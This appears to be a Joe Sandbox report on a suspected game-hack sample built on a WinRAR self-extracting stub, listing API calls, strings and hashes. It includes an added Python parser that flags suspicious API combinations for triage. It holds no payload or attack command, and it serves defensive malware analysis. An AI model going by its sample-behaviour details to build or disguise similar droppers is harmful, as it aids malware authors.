                                      • Instruction ID: 108ce351b88eda6ed1c6d2b20040110694d86d8b8e25edcfc8ea2e02b70e4872
                                      • Opcode Fuzzy Hash: 7498fb9e7530962b23755534e66d1bb8d839221fd8ac3d38f68144dfe3b5e878
                                      • Instruction Fuzzy Hash: 8D319576208302AFCB10DFA1EC59D9BBBADFF85751B044518F946D2260DB71DC42DBA1

                                      Control-flow Graph

                                      APIs
                                      • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00A0A4EF,000000FF,?,?), ref: 00A0A628
                                      • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00A0A4EF,000000FF,?,?), ref: 00A0A65E
                                      • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00A0A4EF,000000FF,?,?), ref: 00A0A66A
                                      • FindNextFileW.KERNEL32(?,?,?,?,?,?,00A0A4EF,000000FF,?,?), ref: 00A0A692
                                      • GetLastError.KERNEL32(?,?,?,?,00A0A4EF,000000FF,?,?), ref: 00A0A69E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: FileFind$ErrorFirstLast$Next
                                      • String ID:
                                      • API String ID: 869497890-0
                                      • Opcode ID: eba045a3ee5fecc0f92435ee094ced7b30ec0b288a6128511804f58130c40215
                                      • Instruction ID: c152b7d9290f48e014214811440ae5bd3f178188888c7ea6d53b6f15437bd96a
                                      • Opcode Fuzzy Hash: eba045a3ee5fecc0f92435ee094ced7b30ec0b288a6128511804f58130c40215
                                      • Instruction Fuzzy Hash: 7C41C372508345AFC724EF68D984ADAF7F8FF59340F040A2AF5D9D3280D735A9948B92
                                      APIs
                                      • GetCurrentProcess.KERNEL32(?,?,00A27513,?,00A3BAD8,0000000C,00A2766A,?,00000002,00000000), ref: 00A2755E
                                      • TerminateProcess.KERNEL32(00000000,?,00A27513,?,00A3BAD8,0000000C,00A2766A,?,00000002,00000000), ref: 00A27565
                                      • ExitProcess.KERNEL32 ref: 00A27577
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: Process$CurrentExitTerminate
                                      • String ID:
                                      • API String ID: 1703294689-0
                                      • Opcode ID: f2f99659585d302e34f3abd2acf004bc37ca87a85f236c7b335916bcf95a1180
                                      • Instruction ID: b004df791d91f889b4b5331c5a5ef15812165ae267a6244b7ce4c69e34bca894
                                      • Opcode Fuzzy Hash: f2f99659585d302e34f3abd2acf004bc37ca87a85f236c7b335916bcf95a1180
                                      • Instruction Fuzzy Hash: 78E0B632008958ABCF11EFA8EE09A49BB69EB51741F108424F9068A232CB35DF83CA50
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: H_prolog_memcmp
                                      • String ID:
                                      • API String ID: 3004599000-0
                                      • Opcode ID: a330aa061aa881dd4c6a21bf94c55f2a7a40af90d608e3b2140bd9b0002e9acb
                                      • Instruction ID: 8fe0ba9cbd1f23855654732ceeabf00e0acd9e9da2ce0e32734f4c3fb462196b
                                      • Opcode Fuzzy Hash: a330aa061aa881dd4c6a21bf94c55f2a7a40af90d608e3b2140bd9b0002e9acb
                                      • Instruction Fuzzy Hash: 89823A3090424DAEDF25DF60D985BFEBBB9AF15300F0841B9E8999B1C3DB355A48CB64
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID:
                                      • API String ID: 3519838083-0
                                      • Opcode ID: bd3b77ca1e8dca3d0724ad473eed9300b063b81f721f588fd23516349432eea5
                                      • Instruction ID: 754e447e7b78520e55d49fce2f71434fc8527f6c03f33d071e6ddd6026f20e78
                                      • Opcode Fuzzy Hash: bd3b77ca1e8dca3d0724ad473eed9300b063b81f721f588fd23516349432eea5
                                      • Instruction Fuzzy Hash: D9D105B1A043458FDB14CF28C9807DBBBE4BF95348F08456DE884DB642D734E999CB9A
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 00A1AEE5
                                        • Part of subcall function 00A0130B: GetDlgItem.USER32(00000000,00003021), ref: 00A0134F
                                        • Part of subcall function 00A0130B: SetWindowTextW.USER32(00000000,00A335B4), ref: 00A01365
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: H_prologItemTextWindow
                                      • String ID: "%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                                      • API String ID: 810644672-3617005944
                                      • Opcode ID: 8f4d94e3be8fef420f1801ead8942b53b0365600a887ce46f090a4ec39f90e2b
                                      • Instruction ID: 83d2d0b5e91773c3cc4123916cc65195e5de31a84f3c339a8943d2fc0ee18bca
                                      • Opcode Fuzzy Hash: 8f4d94e3be8fef420f1801ead8942b53b0365600a887ce46f090a4ec39f90e2b
                                      • Instruction Fuzzy Hash: 3B42F4B5954254BEEB21EBF0AD8AFEE7B7CAB12705F000154F605A60D1CBB94D86CB31

                                      Control-flow Graph

                                      APIs
                                      • GetModuleHandleW.KERNEL32(kernel32), ref: 00A100E4
                                      • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00A100F6
                                      • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00A10127
                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00A103D4
                                      • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00A103F0
                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00A10402
                                      • ReadFile.KERNEL32(00000000,?,00007FFE,00A33BA4,00000000), ref: 00A10421
                                      • CloseHandle.KERNEL32(00000000), ref: 00A10479
                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00A1048F
                                      • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,?,00000000,?,00000800), ref: 00A104E7
                                      • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00000000,?,00000800), ref: 00A10510
                                      • GetFileAttributesW.KERNEL32(?,?,?,00000800), ref: 00A1054A
                                        • Part of subcall function 00A10085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00A100A0
                                        • Part of subcall function 00A10085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00A0EB86,Crypt32.dll,00000000,00A0EC0A,?,?,00A0EBEC,?,?,?), ref: 00A100C2
                                      • _swprintf.LIBCMT ref: 00A105BE
                                      • _swprintf.LIBCMT ref: 00A1060A
                                        • Part of subcall function 00A0400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00A0401D
                                      • AllocConsole.KERNEL32 ref: 00A10612
                                      • GetCurrentProcessId.KERNEL32 ref: 00A1061C
                                      • AttachConsole.KERNEL32(00000000), ref: 00A10623
                                      • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00A10649
                                      • WriteConsoleW.KERNEL32(00000000), ref: 00A10650
                                      • Sleep.KERNEL32(00002710), ref: 00A1065B
                                      • FreeConsole.KERNEL32 ref: 00A10661
                                      • ExitProcess.KERNEL32 ref: 00A10669
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l
                                      • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                                      • API String ID: 1201351596-3298887752
                                      • Opcode ID: c06b9a0681abc6da5182b4a52263968ea42d36d65a1ff9dce74fb9580516b984
                                      • Instruction ID: fb3771a4cf580088a3ea5577cf2bd5d4f8178f6ab8fb5f985890c5769413bdbe
                                      • Opcode Fuzzy Hash: c06b9a0681abc6da5182b4a52263968ea42d36d65a1ff9dce74fb9580516b984
                                      • Instruction Fuzzy Hash: 50D17FB210C384ABDB30DF50DD49FDFBAE8BF85705F50491DF6899A140DBB486898B62

                                      Control-flow Graph

                                      APIs
                                      • __EH_prolog.LIBCMT ref: 00A1BDFA
                                        • Part of subcall function 00A1AA36: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00A1AAFE
                                      • SetWindowTextW.USER32(?,?), ref: 00A1C127
                                      • _wcsrchr.LIBVCRUNTIME ref: 00A1C2B1
                                      • GetDlgItem.USER32(?,00000066), ref: 00A1C2EC
                                      • SetWindowTextW.USER32(00000000,?), ref: 00A1C2FC
                                      • SendMessageW.USER32(00000000,00000143,00000000,00A4A472), ref: 00A1C30A
                                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00A1C335
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
                                      • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                      • API String ID: 3564274579-312220925
                                      • Opcode ID: 6804ae0df9bd545b33a88b2dc0c2ffb71b19610b0266e4168ef1ca3f9ac81aa3
                                      • Instruction ID: c1706b324f6710175ad705a64911b1251d9f408b1425f1c1cb589f66f9701f43
                                      • Opcode Fuzzy Hash: 6804ae0df9bd545b33a88b2dc0c2ffb71b19610b0266e4168ef1ca3f9ac81aa3
                                      • Instruction Fuzzy Hash: 99E1A372D44228AADF25EBA4ED45EEF737DAF09351F0041A6F509E3090EB749EC58B60

                                      Control-flow Graph

                                      APIs
                                      • __EH_prolog.LIBCMT ref: 00A0D346
                                      • _wcschr.LIBVCRUNTIME ref: 00A0D367
                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00A0D328,?), ref: 00A0D382
                                      • __fprintf_l.LIBCMT ref: 00A0D873
                                        • Part of subcall function 00A1137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00A0B652,00000000,?,?,?,00010444), ref: 00A11396
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
                                      • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
                                      • API String ID: 4184910265-980926923
                                      • Opcode ID: 97f20226d492b223ad98bd90efb43aa897330e390fa890b79deb81b99192f312
                                      • Instruction ID: 963e841a80cb1044671904c8f7235819c3d3b2fc87f25e2401cac7af5094fc55
                                      • Opcode Fuzzy Hash: 97f20226d492b223ad98bd90efb43aa897330e390fa890b79deb81b99192f312
                                      • Instruction Fuzzy Hash: 3912AD7290021DAADF24DFA8ED81BEEB7B5BF04300F10456AF505A72C2EB709A44CB24

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 00A1AC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00A1AC85
                                        • Part of subcall function 00A1AC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00A1AC96
                                        • Part of subcall function 00A1AC74: IsDialogMessageW.USER32(00010444,?), ref: 00A1ACAA
                                        • Part of subcall function 00A1AC74: TranslateMessage.USER32(?), ref: 00A1ACB8
                                        • Part of subcall function 00A1AC74: DispatchMessageW.USER32(?), ref: 00A1ACC2
                                      • GetDlgItem.USER32(00000068,00A5ECB0), ref: 00A1CB6E
                                      • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,?,?,?,?,?,?,00A1A632), ref: 00A1CB96
                                      • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00A1CBA1
                                      • SendMessageW.USER32(00000000,000000C2,00000000,00A335B4), ref: 00A1CBAF
                                      • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00A1CBC5
                                      • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00A1CBDF
                                      • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00A1CC23
                                      • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00A1CC31
                                      • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00A1CC40
                                      • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00A1CC67
                                      • SendMessageW.USER32(00000000,000000C2,00000000,00A3431C), ref: 00A1CC76
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                      • String ID: \
                                      • API String ID: 3569833718-2967466578
                                      • Opcode ID: 1cbc6ed34f3185c22f8644c53ecaab4eb3c4360bc49f1de6e1d97f0504ecbf13
                                      • Instruction ID: 5831c004a512c7c72aa27f0749cfd08ce7a06175ba90d2cabaad6ff6689c9792
                                      • Opcode Fuzzy Hash: 1cbc6ed34f3185c22f8644c53ecaab4eb3c4360bc49f1de6e1d97f0504ecbf13
                                      • Instruction Fuzzy Hash: DC31BE71185B41ABE301DF60AC4AFAF7EACEB82B14F010508FA51961D1DBA95D0AC7B6

                                      Control-flow Graph

                                      (interactive graph not reproduced; the Executed/Not Executed colouring is not recoverable from the text. Basic blocks a1ce22-a1d093. Call sites: ShellExecuteExW in a1cf4f-a1cf5c; ShowWindow in a1cf91-a1cf99 and a1d081-a1d084; GetExitCodeProcess in a1cfc6-a1cfd7; CloseHandle in a1cff1-a1cffd.)
                                      APIs
                                      • ShellExecuteExW.SHELL32(?), ref: 00A1CF54
                                      • ShowWindow.USER32(?,00000000), ref: 00A1CF93
                                      • GetExitCodeProcess.KERNEL32(?,?), ref: 00A1CFCF
                                      • CloseHandle.KERNEL32(?), ref: 00A1CFF5
                                      • ShowWindow.USER32(?,00000001), ref: 00A1D084
                                        • Part of subcall function 00A117AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,00A0BB05,00000000,.exe,?,?,00000800,?,?,00A185DF,?), ref: 00A117C2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: ShowWindow$CloseCodeCompareExecuteExitHandleProcessShellString
                                      • String ID: $.exe$.inf
                                      • API String ID: 3686203788-2452507128
                                      • Opcode ID: a6dc0773f601de9db74cc0c116b5703c9890ba9812cdb4925e46490383f1760a
                                      • Instruction ID: f3f4d8426d8d56aa952f81bea8d09708e122fd1a2951f7fcbf2168c941a44fbe
                                      • Opcode Fuzzy Hash: a6dc0773f601de9db74cc0c116b5703c9890ba9812cdb4925e46490383f1760a
                                      • Instruction Fuzzy Hash: DD610271448380AADB31DF64D9006EBBBFAAF85310F08481DF5C697291D7B1DAC6CB92
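The per-function records on this page (the "APIs" list with its call-site "ref:" addresses and "Part of subcall function" entries, the "$"-separated "String ID", the "API String ID" pair) follow a regular text layout, so the block below parses them into structured records and runs a small triage pass over the API combinations. It is an example added to this page, not Joe Sandbox code. SAMPLE is constructed by copying lines from three of the records on this page; the record boundary at each "Control-flow Graph" line, the use of the lowest direct call-site address as a handle for an otherwise unnamed function, and the rule labels in RULES are this example's own assumptions.

```python
"""Parser and triage pass for the per-function "APIs"/"Similarity" records in
this Joe Sandbox report.  Added example for this page, not Joe Sandbox code.
SAMPLE is constructed by copying three records from the page; the RULES labels
are this example's own assumptions, not sandbox verdicts."""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# One API line.  Forms seen on the page: "• Name.MODULE(args), ref: ADDR",
# "• __freea.LIBCMT ref: ADDR" (no argument list) and the same two prefixed
# with "• Part of subcall function ADDR: ".
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
KV_RE = re.compile(r"^•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*)$")   # "• Key: value"
SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Similarity", "Joe Sandbox IDA Plugin"}

@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: int                        # call-site address
    subcall: Optional[int] = None   # callee address when the call is one level down

@dataclass
class FunctionRecord:
    calls: List[ApiCall] = field(default_factory=list)
    meta: dict = field(default_factory=dict)

    @property
    def direct_apis(self) -> set:
        """APIs the function calls itself, excluding 'Part of subcall' entries."""
        return {c.name for c in self.calls if c.subcall is None}

    @property
    def strings(self) -> List[str]:
        """'String ID' is '$'-separated; a leading '$' yields an empty first field."""
        return [s for s in self.meta.get("String ID", "").split("$") if s]

    @property
    def start(self) -> Optional[int]:
        """Lowest direct call-site address (assumption: a usable handle, the dump names no symbol)."""
        return min((c.ref for c in self.calls if c.subcall is None), default=None)

def parse_records(text: str) -> List[FunctionRecord]:
    """Split the dump into records; each record begins at a 'Control-flow Graph' line."""
    records, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Control-flow Graph":
            cur, section = FunctionRecord(), None
            records.append(cur)
        elif cur is None:
            continue                          # text before the first record
        elif line in SECTIONS:
            section = line
        elif section == "APIs" and (m := API_RE.match(line)):
            args = [a for a in (m["args"] or "").split(",") if a]
            cur.calls.append(ApiCall(m["name"], m["module"], args, int(m["ref"], 16),
                                     int(m["sub"], 16) if m["sub"] else None))
        elif section in ("Similarity", "Joe Sandbox IDA Plugin") and (m := KV_RE.match(line)):
            cur.meta[m["key"]] = m["val"].strip()
    return records

# API combinations worth a second look.  Labels are this example's assumptions;
# an extraction stub does all of these legitimately, so they order reading, not convict.
RULES = {
    "spawns a child process and waits for its exit code": {"ShellExecuteExW", "GetExitCodeProcess"},
    "creates a file and rewrites its timestamps": {"CreateFileW", "SetFileTime"},
    "starts a thread": {"CreateThread"},
    "loads a DLL by name at runtime": {"LoadLibraryExW"},
}

def triage(records: List[FunctionRecord]) -> List[tuple]:
    """(start address, label) for every record whose direct APIs cover a rule's set."""
    return [(f"{r.start:08X}" if r.start is not None else "?", label)
            for r in records for label, needed in RULES.items() if needed <= r.direct_apis]

SAMPLE = """\
Control-flow Graph
APIs
• ShellExecuteExW.SHELL32(?), ref: 00A1CF54
• ShowWindow.USER32(?,00000000), ref: 00A1CF93
• GetExitCodeProcess.KERNEL32(?,?), ref: 00A1CFCF
• CloseHandle.KERNEL32(?), ref: 00A1CFF5
  • Part of subcall function 00A117AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,00A0BB05,00000000,.exe,?,?,00000800,?,?,00A185DF,?), ref: 00A117C2
Strings
Similarity
• String ID: $.exe$.inf
• API String ID: 3686203788-2452507128
Control-flow Graph
APIs
• CreateFileW.KERNELBASE(?,?,?,00000000,00000003,?,00000000,?,00000000,?,?,00A078AD,?,00000005,?,00000011), ref: 00A09A4C
• SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00A078AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00A09ADB
Similarity
• String ID:
• API String ID: 1999340476-0
Control-flow Graph
APIs
• __freea.LIBCMT ref: 00A2A23F
  • Part of subcall function 00A28518: RtlAllocateHeap.NTDLL(00000000,?,?,?,00A23A26,?,0000015D,?,?,?,?,00A24F02,000000FF,00000000,?,?), ref: 00A2854A
Similarity
• API String ID: 1414292761-0
"""

if __name__ == "__main__":
    for addr, label in triage(parse_records(SAMPLE)):
        print(addr, "->", label)
```

Run it over the full report text to get one triage line per function; on the sample, the ShellExecuteExW/GetExitCodeProcess record is reported as a process launch that waits for its child and the CreateFileW/SetFileTime record as a file write that rewrites timestamps. Subcall entries are kept on the record but excluded from rule matching, so a function is not credited with APIs its callees make.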

                                      Control-flow Graph

                                      (interactive graph not reproduced; the Executed/Not Executed colouring is not recoverable from the text. Basic blocks a2a058-a2a273. Call sites: MultiByteToWideChar in a2a099-a2a0bd and a2a12d-a2a140; WideCharToMultiByte in a2a22c-a2a23c.)
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00A24F9B,00A24F9B,?,?,?,00A2A2A9,00000001,00000001,3FE85006), ref: 00A2A0B2
                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00A2A2A9,00000001,00000001,3FE85006,?,?,?), ref: 00A2A138
                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,3FE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00A2A232
                                      • __freea.LIBCMT ref: 00A2A23F
                                        • Part of subcall function 00A28518: RtlAllocateHeap.NTDLL(00000000,?,?,?,00A23A26,?,0000015D,?,?,?,?,00A24F02,000000FF,00000000,?,?), ref: 00A2854A
                                      • __freea.LIBCMT ref: 00A2A248
                                      • __freea.LIBCMT ref: 00A2A26D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
